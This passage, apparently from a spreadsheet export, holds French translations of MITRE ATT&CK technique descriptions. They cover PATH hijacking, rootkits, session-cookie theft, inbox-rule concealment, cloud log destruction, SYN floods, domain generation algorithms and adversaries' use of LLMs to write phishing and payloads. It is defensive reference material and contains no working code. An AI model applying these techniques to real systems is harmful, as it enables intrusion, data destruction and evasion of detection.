Par exemple, sous Windows, si un adversaire place un programme malveillant nommé « net.exe » dans 'C :\example path', qui précède par défaut 'C :\Windows\system32\net.exe' dans la variable d’environnement PATH, lorsque « net » est exécuté à partir de la ligne de commande, 'C :\example path' sera appelé à la place de l’exécutable légitime du système à 'C :\Windows\system32\net.exe. Certaines méthodes d’exécution d’un programme s’appuient sur la variable d’environnement PATH pour déterminer les emplacements recherchés lorsque le chemin d’accès du programme n’est pas indiqué, comme l’exécution de programmes à partir d’un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059). (Citation : ExpressVPN PATH env Windows 2021)
Les adversaires peuvent également modifier directement la variable $PATH en spécifiant les répertoires à rechercher.  Un adversaire peut modifier la variable '$PATH' pour qu’elle pointe vers un répertoire auquel il a un accès en écriture. Lorsqu’un programme utilisant la variable $PATH est appelé, le système d’exploitation recherche le répertoire spécifié et exécute le binaire malveillant. Sur macOS, cela peut également être effectué en modifiant la variable $HOME. Ces variables peuvent être modifiées à l’aide de la ligne de commande, de launchctl, de [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), ou en modifiant le contenu du dossier '/etc/paths.d'. (Citation : uptycs Fake POC linux malware 2023)(Citation : Variables PATH macOS nixCraft)(Citation : Elastic Rules macOS launchctl 2022)
https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter le référentiel SharePoint comme source pour extraire des informations précieuses. SharePoint contient souvent des informations utiles pour qu’un adversaire puisse en savoir plus sur la structure et les fonctionnalités du réseau et des systèmes internes. Par exemple, voici une liste d’exemples d’informations qui peuvent avoir une valeur potentielle pour un adversaire et qui peuvent également être trouvées sur SharePoint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https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder directement à un volume pour contourner les contrôles d’accès aux fichiers et la surveillance du système de fichiers. Windows permet aux programmes d’avoir un accès direct aux volumes logiques. Les programmes disposant d’un accès direct peuvent lire et écrire des fichiers directement à partir du lecteur en analysant les structures de données du système de fichiers. Cette technique peut contourner les contrôles d’accès aux fichiers Windows ainsi que les outils de surveillance du système de fichiers. (Citation : Hakobyan 2009)
Des utilitaires, tels que « NinjaCopy », existent pour effectuer ces actions dans PowerShell. (Citation : github powersploit ninjacopy) Les adversaires peuvent également utiliser des utilitaires intégrés ou tiers (tels que 'vssadmin', 'wbadmin' et [esentutl](https://attack.mitre.org/software/S0404)) pour créer des clichés instantanés ou des sauvegardes de données à partir de volumes système. (Citation : LOLBAS Esentutl)
https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>Les adversaires peuvent avoir accès à des outils d’intelligence artificielle générative, tels que les grands modèles de langage (LLM), pour faciliter diverses techniques de ciblage. Ces outils peuvent être utilisés pour informer, renforcer et permettre diverses tâches malveillantes, notamment la réalisation de [Reconnaissance](https://attack.mitre.org/tactics/TA0043), la création de scripts de base, l’assistance à l’ingénierie sociale et même le développement de charges utiles. (Référence : MSFT-AI)
Par exemple, en utilisant un LLM accessible au public, un adversaire externalise ou automatise essentiellement certaines tâches à l’outil. À l’aide de l’IA, l’adversaire peut rédiger et générer du contenu dans diverses langues écrites à utiliser dans les campagnes [d’hameçonnage](https://attack.mitre.org/techniques/T1566)/[d’hameçonnage à titre d’information](https://attack.mitre.org/techniques/T1598). Le même outil accessible au public peut permettre d’autres recherches sur les vulnérabilités ou d’autres recherches offensives soutenant [Développer des capacités](https://attack.mitre.org/techniques/T1587). Les outils d’IA peuvent également automatiser des tâches techniques en générant, affinant ou améliorant de toute autre manière (par exemple, [Fichiers ou informations obfusqués](https://attack.mitre.org/techniques/T1027)) des scripts et des charges utiles malveillants. (Citation : OpenAI-CTI)
https://attack.mitre.org/techniques/T1588/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de modifier les structures hiérarchiques dans les environnements d’infrastructure en tant que service (IaaS) afin d’échapper aux défenses.  
Les environnements IaaS regroupent souvent les ressources dans une hiérarchie, ce qui permet d’améliorer la gestion des ressources et l’application des politiques aux groupes concernés. Les structures hiérarchiques diffèrent d’un fournisseur de cloud à l’autre. Par exemple, dans les environnements AWS, plusieurs comptes peuvent être regroupés sous une seule organisation, tandis que dans les environnements Azure, plusieurs abonnements peuvent être regroupés sous un seul groupe de gestion. (Référence : AWS Organizations)(Citation : Ressources Microsoft Azure)
Les adversaires peuvent ajouter, supprimer ou modifier des groupes de ressources au sein d’une hiérarchie IaaS. Par exemple, dans les environnements Azure, un adversaire qui a obtenu l’accès à un compte d’administrateur général peut créer des abonnements dans lesquels déployer des ressources. Ils peuvent également se livrer au détournement d’abonnement en transférant un abonnement à l’utilisation existant d’un locataire victime à un locataire contrôlé par l’adversaire. Cela permettra à l’adversaire d’utiliser les ressources de calcul de la victime sans générer de journaux sur le locataire victime. (Citation : Microsoft Peach Sandstorm 2023)(Citation : Détournement d’abonnement Microsoft 2022)
Dans les environnements AWS, les adversaires disposant des autorisations appropriées dans un compte donné peuvent appeler l’API « LeaveOrganization », ce qui entraîne la séparation du compte de l’organisation AWS à laquelle il était lié et supprime toutes les politiques de contrôle de service, les garde-fous ou les restrictions qui lui sont imposés par son ancienne organisation. Les adversaires peuvent également appeler l’API « CreateAccount » afin de créer un nouveau compte au sein d’une organisation AWS. Ce compte utilisera les mêmes méthodes de paiement que celles enregistrées sur le compte de paiement, mais ne sera peut-être pas soumis aux détections ou aux politiques de contrôle de service existantes. (Référence : AWS RE :Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1666</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des règles de messagerie pour masquer les e-mails entrants dans la boîte aux lettres d’un utilisateur compromis. De nombreux clients de messagerie permettent aux utilisateurs de créer des règles de boîte de réception pour diverses fonctions de messagerie, notamment le déplacement des e-mails vers d’autres dossiers, le marquage des e-mails comme lus ou la suppression d’e-mails. Les règles peuvent être créées ou modifiées dans les clients de messagerie ou par le biais de fonctionnalités externes telles que les applets de commande &lt;code&gt;New-InboxRule&lt;/code&gt; ou &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) sur les systèmes Windows. (Citation : Règles de boîte de réception Microsoft)(Citation : Règles de messagerie MacOS)(Citation : Microsoft New-InboxRule)(Citation : Microsoft Set-InboxRule)
Les adversaires peuvent utiliser des règles de messagerie dans la boîte aux lettres d’un utilisateur compromis pour supprimer et/ou déplacer des e-mails vers des dossiers moins visibles. Les adversaires peuvent le faire pour masquer les alertes de sécurité, les communications C2 ou les réponses aux e-mails [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) envoyés à partir du compte compromis.
Tout utilisateur ou administrateur au sein de l’organisation (ou tout adversaire disposant d’informations d’identification valides) peut être en mesure de créer des règles pour déplacer ou supprimer automatiquement les e-mails. Ces règles peuvent être utilisées de manière abusive pour altérer ou retarder la détection si le contenu de l’e-mail avait été immédiatement vu par un utilisateur ou un défenseur. Les règles malveillantes filtrent généralement les e-mails en fonction de mots clés (tels que &lt;code&gt;logiciel malveillant&lt;/code&gt;, &lt;code&gt;suspect,&lt;/code&gt; &lt;code&gt;hameçonnage&lt;/code&gt; et &lt;code&gt;piratage&lt;/code&gt;) trouvés dans le corps des messages et les lignes d’objet. (Citation : Sécurité des applications cloud Microsoft)
Dans certains environnements, les administrateurs peuvent être en mesure d’activer des règles de messagerie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de modifier ou de supprimer automatiquement tous les e-mails liés à des sujets spécifiques (tels que les notifications d’incidents de sécurité internes).
https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>Un adversaire peut dégrader des systèmes externes à une organisation dans le but de diffuser des messages, d’intimider ou d’induire en erreur une organisation ou des utilisateurs. [Défiguration externe](https://attack.mitre.org/techniques/T1491/002) peut finalement amener les utilisateurs à se méfier des systèmes et à remettre en question/discréditer l’intégrité du système. Les sites Web externes sont souvent victimes de la défiguration ; Souvent pris pour cible par des groupes d’adversaires et d’hacktivistes afin de faire passer un message politique ou de diffuser de la propagande. (Citation : Cybermenaces de FireEye pour les industries des médias)(Citation : Déclaration de Kevin Mandia devant la Commission du renseignement du Sénat américain)(Citation : Des pirates anonymes défigurent le site du gouvernement russe) [Défiguration externe](https://attack.mitre.org/techniques/T1491/002) peuvent être utilisés comme catalyseur pour déclencher des événements ou en réponse à des mesures prises par une organisation ou un gouvernement. De même, la défiguration d’un site Web peut également être utilisée comme configuration ou précurseur d’attaques futures telles que [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). (Citation : Trend Micro Deep Dive into Defigurement)
https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent chiffrer ou encoder des fichiers pour masquer des chaînes, des octets et d’autres motifs spécifiques afin d’entraver la détection. Le chiffrement et/ou l’encodage du contenu d’un fichier visent à dissimuler des artefacts malveillants dans un fichier utilisé dans une intrusion. De nombreuses autres techniques, telles que le [Software Packing](https://attack.mitre.org/techniques/T1027/002), la [Steganographie](https://attack.mitre.org/techniques/T1027/003) et les [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), partagent le même objectif général. Le chiffrement et/ou l’encodage des fichiers peuvent entraîner une défaillance de la détection des signatures statiques, mais ce contenu malveillant n’est révélé (c’est-à-dire [Débrouiller/Décoder des fichiers ou des informations](https://attack.mitre.org/techniques/T1140)) au moment de l’exécution/de l’utilisation.
Ce type d’obfuscation de fichiers peut être appliqué à de nombreux artefacts de fichiers présents sur les hôtes victimes, tels que les fichiers de journal/configuration de logiciels malveillants et les fichiers de charge utile. (Citation : Obscurcissement de fichier) Les fichiers peuvent être chiffrés à l’aide d’une clé codée en dur ou fournie par l’utilisateur, ainsi que masqués à l’aide de schémas d’encodage/compression standard tels que Base64.
L’intégralité du contenu d’un fichier peut être obscurcie, ou seulement des fonctions ou des valeurs spécifiques (telles que les adresses C2). Le chiffrement et l’encodage peuvent également être appliqués dans des couches redondantes pour une protection supplémentaire.
Par exemple, les adversaires peuvent abuser de documents Word protégés par mot de passe ou d’archives auto-extractibles (SFX) comme méthode de chiffrement/encodage d’un fichier tel qu’une charge utile [Phishing](https://attack.mitre.org/techniques/T1566). Ces fichiers fonctionnent généralement en attachant le contenu archivé prévu à un stub de décompresseur qui est exécuté lorsque le fichier est appelé (par exemple, [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204)). (Citation : SFX - Fichier crypté/encodé) 
Les adversaires peuvent également abuser des schémas d’encodage spécifiques aux fichiers ainsi que des schémas de codage personnalisés. Par exemple, les en-têtes BOM (Byte Order Mark) dans les fichiers texte peuvent être utilisés de manière abusive pour manipuler et obscurcir le contenu du fichier jusqu’à l’exécution de [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
https://attack.mitre.org/techniques/T1027/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter les adresses IP de la victime qui peuvent être utilisées lors du ciblage. Les adresses IP publiques peuvent être attribuées aux organisations par bloc ou par une plage d’adresses séquentielles. Les informations sur les adresses IP attribuées peuvent inclure divers détails, tels que les adresses IP utilisées. Les adresses IP peuvent également permettre à un adversaire d’obtenir d’autres détails sur une victime, tels que la taille de l’organisation, l’emplacement physique, le fournisseur d’accès à Internet et/ou l’endroit et la manière dont son infrastructure publique est hébergée.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations relatives aux adresses IP attribuées peuvent également être exposées à des adversaires via des ensembles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https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent lancer une attaque par déni de service (DoS) ciblant le système d’exploitation (OS) d’un terminal. Le système d’exploitation d’un système est chargé de gérer les ressources limitées et d’éviter que l’ensemble du système ne soit submergé par des demandes excessives sur sa capacité. Ces attaques n’ont pas besoin d’épuiser les ressources réelles d’un système ; les attaques peuvent simplement épuiser les limites et les ressources disponibles qu’un système d’exploitation s’impose lui-même.
Il existe différentes façons d’y parvenir, notamment les attaques d’épuisement d’état TCP telles que les inondations SYN et les inondations ACK. (Citation : Arbor AnnualDoSreport janvier 2018) Avec les inondations SYN, des quantités excessives de paquets SYN sont envoyées, mais l’établissement de liaison TCP à 3 voies n’est jamais terminé. Étant donné que chaque système d’exploitation dispose d’un nombre maximal de connexions TCP simultanées qu’il autorise, cela peut rapidement épuiser la capacité du système à recevoir de nouvelles demandes de connexions TCP, empêchant ainsi l’accès à tout service TCP fourni par le serveur. (Citation : Cloudflare SynFlood)
Les inondations ACK exploitent la nature étatique du protocole TCP. Un flot de paquets ACK est envoyé à la cible. Cela oblige le système d’exploitation à rechercher dans sa table d’état une connexion TCP associée qui a déjà été établie. Étant donné que les paquets ACK concernent des connexions qui n’existent pas, le système d’exploitation devra effectuer une recherche dans l’intégralité de la table d’état pour confirmer qu’aucune correspondance n’existe. Lorsqu’il est nécessaire de le faire pour un grand nombre de paquets, les exigences de calcul peuvent entraîner la lenteur et/ou l’inactivité du serveur, en raison du travail qu’il doit effectuer pour éliminer les paquets ACK non autorisés. Cela réduit considérablement les ressources disponibles pour fournir le service ciblé. (Référence : Corero SYN-ACKflood)
https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des rootkits pour masquer la présence de programmes, de fichiers, de connexions réseau, de services, de pilotes et d’autres composants du système. Les rootkits sont des programmes qui cachent l’existence de logiciels malveillants en interceptant/connectant et en modifiant les appels API du système d’exploitation qui fournissent des informations système. (Citation : Rootkits Windows Symantec) 
Les rootkits ou les fonctionnalités d’activation des rootkits peuvent résider au niveau de l’utilisateur ou du noyau dans le système d’exploitation ou à un niveau inférieur, pour inclure un hyperviseur, un enregistrement de démarrage principal ou un [microprogramme système](https://attack.mitre.org/techniques/T1542/001). (citation : Wikipedia rootkit) Les rootkits ont été vus pour les systèmes Windows, Linux et Mac OS X. (Citation : CrowdStrike Linux Rootkit) (Citation : BlackHat Mac OSX Rootkit)
https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir de la persistance et des privilèges élevés en exécutant du contenu malveillant déclenché par des profils PowerShell. Un profil PowerShell (&lt;code&gt;profile.ps1&lt;/code&gt;) est un script qui s’exécute au démarrage de [PowerShell](https://attack.mitre.org/techniques/T1059/001) et qui peut être utilisé comme script d’ouverture de session pour personnaliser les environnements utilisateur.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) Prend en charge plusieurs profils en fonction de l’utilisateur ou du programme hôte. Par exemple, il peut exister différents profils pour les programmes hôtes [PowerShell](https://attack.mitre.org/techniques/T1059/001) tels que la console PowerShell, PowerShell ISE ou Visual Studio Code. Un administrateur peut également configurer un profil qui s’applique à tous les utilisateurs et programmes hôtes sur l’ordinateur local. (Citation : Microsoft à propos des profils) 
Les adversaires peuvent modifier ces profils pour inclure des commandes, des fonctions, des modules et/ou des lecteurs [PowerShell](https://attack.mitre.org/techniques/T1059/001) arbitraires afin d’obtenir une persistance. Chaque fois qu’un utilisateur ouvre une session [PowerShell](https://attack.mitre.org/techniques/T1059/001), le script modifié est exécuté, sauf si l’indicateur &lt;code&gt;-NoProfile&lt;/code&gt; est utilisé lors de son lancement. (Citation : ESET Turla PowerShell mai 2019) 
Un adversaire peut également être en mesure d’élever les privilèges si un script dans un profil PowerShell est chargé et exécuté par un compte disposant de privilèges plus élevés, tel qu’un administrateur de domaine. (Citation : Wits End et profils PowerShell louches)
https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de diverses implémentations de JavaScript pour l’exécution. JavaScript (JS) est un langage de script indépendant de la plate-forme (compilé juste-à-temps au moment de l’exécution) généralement associé aux scripts des pages Web, bien que JS puisse être exécuté dans des environnements d’exécution en dehors du navigateur. (Citation : NodeJS)
JScript est l’implémentation Microsoft de la même norme de script. JScript est interprété via le moteur de script Windows et donc intégré à de nombreux composants de Windows tels que les pages [Component Object Model](https://attack.mitre.org/techniques/T1559/001) et Internet Explorer HTML Application (HTA). (Citation : JScrip mai 2018)(Citation : Microsoft JScript 2007)(Citation : Scripts Microsoft Windows)
JavaScript for Automation (JXA) est un langage de script macOS basé sur JavaScript, inclus dans l’architecture Open Scripting Architecture (OSA) d’Apple, qui a été introduit dans OSX 10.10. L’OSA d’Apple fournit des capacités de script pour contrôler les applications, s’interfacer avec le système d’exploitation et faire le lien entre l’accès au reste des API internes d’Apple. À partir d’OSX 10.10, OSA ne prend en charge que deux langues, JXA et [AppleScript](https://attack.mitre.org/techniques/T1059/002). Les scripts peuvent être exécutés via l’utilitaire de ligne de commande &lt;code&gt;osascript&lt;/code&gt;, ils peuvent être compilés dans des applications ou des fichiers de script via &lt;code&gt;osacompile&lt;/code&gt;, et ils peuvent être compilés et exécutés en mémoire d’autres programmes en exploitant le framework OSAKit. (Citation : Apple À propos de Mac Scripting 2016)(Citation : SpecterOps JXA 2020)(Citation : SentinelOne macOS Red Team)(Citation : Moineau argenté Red Canary, février 2021)(Citation : MDSec macOS JXA et VSCode)
Les adversaires peuvent abuser de diverses implémentations de JavaScript pour exécuter divers comportements. Les utilisations courantes incluent l’hébergement de scripts malveillants sur des sites Web dans le cadre d’une [compromission intempestive](https://attack.mitre.org/techniques/T1189) ou le téléchargement et l’exécution de ces fichiers de script en tant que charges utiles secondaires. Étant donné que ces charges utiles sont basées sur du texte, il est également très courant que des adversaires obscurcissent leur contenu dans le cadre de [Fichiers ou informations obscurcis](https://attack.mitre.org/techniques/T1027).
https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le DNS de la victime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enregistrements DNS MX, TXT et SPF peuvent également révéler l’utilisation de fournisseurs de cloud et de SaaS tiers, tels qu’Office 365, G Suite, Salesforce ou Zendesk. (Citation : Sean Metcalf Twitter DNS records)
Les adversaires peuvent collecter ces informations de différentes manières, par exemple en interrogeant ou en collectant des détails via [DNS/DNS passif](https://attack.mitre.org/techniques/T1596/001). Les informations DNS peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : benne à ordures DNS)(Citation : Circl DNS passif) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596), [Recherche dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Analyse active](https://attack.mitre.org/techniques/T1595)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure]( https://attack.mitre.org/techniques/T1584)), et/ou l’accès initial (ex : [Services à distance externes](https://attack.mitre.org/techniques/T1133)).
Les adversaires peuvent également utiliser le transfert de zone DNS (requête DNS de type AXFR) pour collecter tous les enregistrements d’un serveur DNS mal configuré. (Citation : Trails-DNS)(Citation : DNS-CISA)(Citation : Alexa-dns)
https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les politiques de cycle de vie d’un compartiment de stockage cloud pour détruire tous les objets qui y sont stockés.  
Les compartiments de stockage dans le cloud permettent souvent aux utilisateurs de définir des politiques de cycle de vie pour automatiser la migration, l’archivage ou la suppression d’objets après une période de temps définie. (Référence : Cycles de vie du stockage AWS)(Citation : Cycles de vie du stockage GCP)(Citation : Cycles de vie du stockage Azure) Si un auteur de menace dispose des autorisations suffisantes pour modifier ces politiques, il peut être en mesure de supprimer tous les objets en même temps. 
Par exemple, dans les environnements AWS, un adversaire disposant de l’autorisation « PutLifecycleConfiguration » peut utiliser l’appel d’API « PutBucketLifecycle » pour appliquer une politique de cycle de vie à un compartiment S3 qui supprime tous les objets du compartiment au bout d’un jour. (Citation : Ransomware de Palo Alto Cloud) Outre la destruction de données à des fins d’extorsion et de [vol financier](https://attack.mitre.org/techniques/T1657), les adversaires peuvent également effectuer cette action sur des compartiments stockant des journaux cloud pour [Suppression de l’indicateur](https://attack.mitre.org/techniques/T1070). (Référence : Datadog S3 Lifecycle CloudTrail Logs)
https://attack.mitre.org/techniques/T1485/001</t>
  </si>
  <si>
    <t>Un adversaire peut exploiter les périphériques d’un ordinateur (par exemple, les microphones et les webcams) ou les applications (par exemple, les services d’appels vocaux et vidéo) pour capturer des enregistrements audio dans le but d’écouter des conversations sensibles afin de recueillir des informations. (Citation : ESET Attor octobre 2019)
Des logiciels malveillants ou des scripts peuvent être utilisés pour interagir avec les appareils via une API disponible fournie par le système d’exploitation ou une application de capture audio. Les fichiers audio peuvent être écrits sur le disque et exfiltrés ultérieurement.
https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des processus au niveau du système pour exécuter de manière répétée des charges utiles malveillantes dans le cadre de la persistance. Lorsque les systèmes d’exploitation démarrent, ils peuvent démarrer des processus qui exécutent des fonctions système en arrière-plan. Sous Windows et Linux, ces processus système sont appelés services. (Citation : TechNet Services) Sous macOS, les processus launchd connus sous le nom de [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) et [Launch Agent](https://attack.mitre.org/techniques/T1543/001) sont exécutés pour terminer l’initialisation du système et charger les paramètres spécifiques à l’utilisateur. (Citation : démons de l’agent de lancement AppleDocs) 
Les adversaires peuvent installer de nouveaux services, démons ou agents qui peuvent être configurés pour s’exécuter au démarrage ou à un intervalle reproductible afin d’établir la persistance. De même, les adversaires peuvent modifier des services, des démons ou des agents existants pour obtenir le même effet.  
Les services, les démons ou les agents peuvent être créés avec des privilèges d’administrateur, mais exécutés avec des privilèges root/SYSTEM. Les adversaires peuvent exploiter cette fonctionnalité pour créer ou modifier des processus système afin d’élever les privilèges. (Citation : Détection des logiciels malveillants OSX)
https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti de services à distance externes pour accéder initialement à un réseau et/ou y persister. Les services à distance tels que les VPN, Citrix et d’autres mécanismes d’accès permettent aux utilisateurs de se connecter aux ressources du réseau interne de l’entreprise à partir d’emplacements externes. Il existe souvent des passerelles de service distantes qui gèrent les connexions et l’authentification des informations d’identification pour ces services. Des services tels que [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) et [VNC](https://attack.mitre.org/techniques/T1021/005) peuvent également être utilisés en externe. (Citation : Logiciel MacOS VNC pour le bureau à distance)
L’accès à [Comptes valides](https://attack.mitre.org/techniques/T1078) pour utiliser le service est souvent une exigence, qui peut être obtenue par le biais du pharming d’identifiants ou en obtenant les identifiants des utilisateurs après avoir compromis le réseau d’entreprise. (Citation : Volexity Virtual Private Keylogging) L’accès aux services distants peut être utilisé comme mécanisme d’accès redondant ou persistant au cours d’une opération.
L’accès peut également être obtenu par le biais d’un service exposé qui ne nécessite pas d’authentification. Dans les environnements conteneurisés, il peut s’agir d’une API Docker exposée, d’un serveur d’API Kubernetes, d’un kubelet ou d’une application web telle que le tableau de bord Kubernetes. (Citation : Trend Micro Exposed Docker Server)(Citation : Unité 42 Hildegard Malware)
https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir la persistance en exécutant du contenu malveillant déclenché par l’exécution de fichiers binaires corrompus. Les binaires Mach-O ont une série d’en-têtes qui sont utilisés pour effectuer certaines opérations lorsqu’un binaire est chargé. L’en-tête LC_LOAD_DYLIB d’un binaire Mach-O indique à macOS et OS X les bibliothèques dynamiques (dylibs) à charger pendant l’exécution. Ceux-ci peuvent être ajoutés ad hoc au binaire compilé tant que des ajustements sont apportés au reste des champs et dépendances. (Citation : Écrire un mauvais logiciel malveillant pour OSX) Des outils sont disponibles pour effectuer ces modifications.
Les adversaires peuvent modifier les en-têtes binaires Mach-O pour charger et exécuter des dylibs malveillants à chaque fois que le binaire est exécuté. Bien que toute modification invalide les signatures numériques sur les fichiers binaires car le fichier binaire est en cours de modification, cela peut être corrigé en supprimant simplement la commande LC_CODE_SIGNATURE du fichier binaire afin que la signature ne soit pas vérifiée au moment du chargement. (Citation : Persistance des logiciels malveillants sur OS X)
https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>Un adversaire peut voler des cookies de session d’applications Web ou de services et les utiliser pour accéder à des applications Web ou à des services Internet en tant qu’utilisateur authentifié sans avoir besoin d’informations d’identification. Les applications et services Web utilisent souvent des cookies de session comme jeton d’authentification une fois qu’un utilisateur s’est authentifié sur un site Web.
Les cookies sont souvent valables pour une période prolongée, même si l’application web n’est pas utilisée activement. Les cookies se trouvent sur le disque, dans la mémoire du navigateur et dans le trafic réseau vers des systèmes distants. En outre, d’autres applications sur la machine cible peuvent stocker des cookies d’authentification sensibles en mémoire (par exemple, des applications qui s’authentifient auprès des services cloud). Les cookies de session peuvent être utilisés pour contourner certains protocoles d’authentification multifactorielle. (Citation : Passez le cookie)
Il existe plusieurs exemples de logiciels malveillants ciblant les cookies des navigateurs Web sur le système local. (Référence : Kaspersky TajMahal, avril 2019)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019) Les adversaires peuvent également voler des cookies en injectant du contenu JavaScript malveillant dans des sites Web ou en s’appuyant sur [User Execution](https://attack.mitre.org/techniques/T1204) en incitant les victimes à exécuter du JavaScript malveillant dans leur navigateur. (Citation : Talos Roblox Scam 2023)(Citation : Favoris Discord de Krebs 2023)
Il existe également des frameworks open source tels que « Evilginx2 » et « Muraena » qui peuvent collecter des cookies de session via un proxy malveillant (par exemple, [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) qui peuvent être configurés par un adversaire et utilisés dans des campagnes de phishing. (Citation : Github evilginx2)(Citation : GitHub Mauraena)
Une fois qu’un adversaire a acquis un cookie valide, il peut ensuite exécuter une technique [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) pour se connecter à l’application Web correspondante.
https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la fonctionnalité de planification des tâches fournie par les outils d’orchestration de conteneurs tels que Kubernetes pour planifier le déploiement de conteneurs configurés pour exécuter du code malveillant. Les tâches d’orchestration de conteneurs exécutent ces tâches automatisées à une date et une heure spécifiques, comme les tâches cron sur un système Linux. Les déploiements de ce type peuvent également être configurés pour maintenir une quantité de conteneurs au fil du temps, ce qui automatise le processus de maintien de la persistance au sein d’un cluster.
Dans Kubernetes, un CronJob peut être utilisé pour planifier un Job qui exécute un ou plusieurs conteneurs afin d’effectuer des tâches spécifiques. (Citation : Emplois Kubernetes)(Citation : Kubernetes CronJob) Par conséquent, un adversaire peut utiliser un CronJob pour planifier le déploiement d’un Job qui exécute du code malveillant dans divers nœuds d’un cluster. (Citation : Matrice des menaces pour Kubernetes)
https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des algorithmes de génération de domaine (DGA) pour identifier dynamiquement un domaine de destination pour le trafic de commande et de contrôle plutôt que de s’appuyer sur une liste d’adresses IP statiques ou de domaines. Cela a l’avantage de rendre beaucoup plus difficile pour les défenseurs de bloquer, de suivre ou de prendre le contrôle du canal de commande et de contrôle, car il peut y avoir des milliers de domaines que les logiciels malveillants peuvent vérifier pour obtenir des instructions. (Citation : Cybereason dissèquant les DGA)(Citation : Cisco Umbrella DGA)(Citation : Unité 42 DGA février 2019)
Les DGA peuvent prendre la forme de chaînes apparemment aléatoires ou de « charabia » (ex : istgmxdejdnxuyla.ru) lorsqu’elles construisent des noms de domaine en générant chaque lettre. Alternativement, certains DGA utilisent des mots entiers comme unité en concaténant des mots ensemble au lieu de lettres (ex : cityjulydish.net). De nombreux DGA sont basés sur le temps, générant un domaine différent pour chaque période (horaire, quotidienne, mensuelle, etc.). D’autres intègrent également une valeur de départ pour rendre la prédiction des domaines futurs plus difficile pour les défenseurs. (Citation : Cybereason dissèquant les DGA)(Citation : Cisco Umbrella DGA)(Citation : Talos CCleanup 2017)(Référence : Akamai DGA Mitigation)
Les adversaires peuvent utiliser les DGA à des fins de [canaux de secours](https://attack.mitre.org/techniques/T1008). Lorsque le contact est perdu avec le serveur de commande et de contrôle principal, les logiciels malveillants peuvent utiliser un DGA comme moyen de rétablir la commande et le contrôle. (Citation : Talos CCleanup 2017)(Citation : FireEye POSHSPY avril 2017)(Citation : Activité ESET Sednit 2017)
https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’une double extension dans le nom de fichier afin de masquer le véritable type de fichier. Un nom de fichier peut inclure une extension de type de fichier secondaire qui peut entraîner l’affichage uniquement de la première extension (ex : &lt;code&gt;File.txt.exe&lt;/code&gt; peut s’afficher dans certaines vues comme &lt;code&gt;File.txt&lt;/code&gt;). Cependant, la deuxième extension est le type de fichier réel qui détermine la façon dont le fichier est ouvert et exécuté. L’extension de fichier réelle peut être cachée par le système d’exploitation dans le navigateur de fichiers (ex : explorer.exe), ainsi que dans tout logiciel configuré à l’aide ou similaire aux politiques du système. (Citation : PCMag DoubleExtension)(Citation : SOCPrime DoubleExtension) 
